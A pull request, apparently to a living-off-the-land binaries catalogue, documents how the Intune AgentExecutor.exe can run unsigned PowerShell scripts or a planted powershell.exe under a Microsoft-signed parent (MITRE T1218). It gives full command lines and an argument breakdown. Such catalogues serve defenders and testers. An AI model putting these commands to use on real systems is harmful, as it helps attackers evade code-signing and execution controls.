### PR TITLE
Added method for AgentExecutor

### DIFF
--- a/yml/OtherMSBinaries/agentexecutor.yml
+++ b/yml/OtherMSBinaries/agentexecutor.yml
@@ -1,0 +1,34 @@
+---
+Name: AgentExecutor.exe
+Description: Intune Management Extension included on Intune Managed Devices
+Author: 'Eleftherios Panos'
+Created: '23/07/2020'
+Commands:
+  - Command: AgentExecutor.exe -powershell "c:\temp\malicious.ps1" "c:\temp\test.log" "c:\temp\test1.log" "c:\temp\test2.log" 60000 "C:\Windows\SysWOW64\WindowsPowerShell\v1.0" 0 1
+    Description: Spawns powershell.exe and executes a provided powershell script with ExecutionPolicy Bypass argument
+    Usecase: Execute unsigned powershell scripts
+    Category: Execute
+    Privileges: User
+    MitreID: T1218
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
+    OperatingSystem: Windows 10
+  - Command: AgentExecutor.exe -powershell "c:\temp\malicious.ps1" "c:\temp\test.log" "c:\temp\test1.log" "c:\temp\test2.log" 60000 "C:\temp\" 0 1
+    Description: If we place a binary named powershell.exe in the path c:\temp, agentexecutor.exe will execute it successfully
+    Usecase: Execute a provided EXE
+    Category: Execute
+    Privileges: User
+    MitreID: T1218
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
+    OperatingSystem: Windows 10
+Full_Path:
+  - Path: C:\Program Files (x86)\Microsoft Intune Management Extension
+Code_Sample: 
+  - Code:
+Detection: 
+  - IOC:
+Resources:
+  - Link: 
+Acknowledgement:
+  - Person: Eleftherios Panos
+    Handle: @lefterispan
+---


### PR DESCRIPTION
AgentExecutor is binary installed on Intune managed devices. The application takes the following arguments:

- args[0] -> "-powershell"
- args[1] -> Location of powershell script we want to execute
- args[2] -> Execution Log file path
- args[3] -> Error Log file path 
- args[4] -> Timeout Log filepath
- args[5] -> Timeout secs
- args[6] -> Location where powershell.exe resides
- args[7] -> enforceSignatureCheck
- args[8] -> runAs32BitOn

The binary enables the execution of unsigned powershell scripts.
Additionally, if we place a binary named powershell.exe under an arbitrary location it will be executed having as a parent the Microsoft Signed binary AgentExecutor.exe.

Sample execution:
```
C:\Program Files (x86)\Microsoft Intune Management Extension\AgentExecutor.exe -powershell "C:\temp\malicious.ps1" "C:\temp\test.log" "C:\temp\test1.log" "C:\temp\test2.log" 60000 "C:\Windows\SysWOW64\WindowsPowerShell\v1.0" 0 1
```